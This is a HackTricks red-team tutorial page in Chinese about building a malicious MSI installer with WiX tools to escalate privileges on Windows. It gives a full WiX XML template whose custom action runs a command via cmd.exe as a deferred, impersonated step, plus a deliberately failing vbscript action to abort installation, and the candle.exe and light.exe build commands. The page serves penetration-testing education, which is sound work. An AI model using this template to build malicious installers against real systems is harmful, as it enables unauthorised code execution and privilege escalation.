Create MSI with WIX

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

支持HackTricks的其他方式:

创建恶意MSI并获取Root权限

将使用wixtools创建MSI安装程序,具体来说将使用wixtools。值得一提的是,尝试了替代的MSI构建工具,但在这种特定情况下并不成功。

为了全面了解wix MSI的用法示例,建议参考此页面。在这里,您可以找到多个示例,演示了wix MSI的用法。

目标是生成一个将执行lnk文件的MSI。为了实现这一目标,可以使用以下XML代码(xml来自此处):

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
fail_here
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>

重要的是要注意,Package元素包含诸如InstallerVersion和Compressed之类的属性,指定安装程序的版本并指示软件包是否已压缩。

创建过程涉及使用candle.exe,这是wixtools中的一个工具,用于从msi.xml生成wixobject。应执行以下命令:

candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml

此外,帖子中提供了一幅图像,展示了命令及其输出。您可以参考它进行视觉指导。

此外,light.exe,wixtools 中的另一个工具,将被用来从 wixobject 创建 MSI 文件。要执行的命令如下:

light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix

参考资料

从零开始学习AWS黑客技术 htARTE (HackTricks AWS Red Team Expert)!

支持HackTricks的其他方式:

最后更新于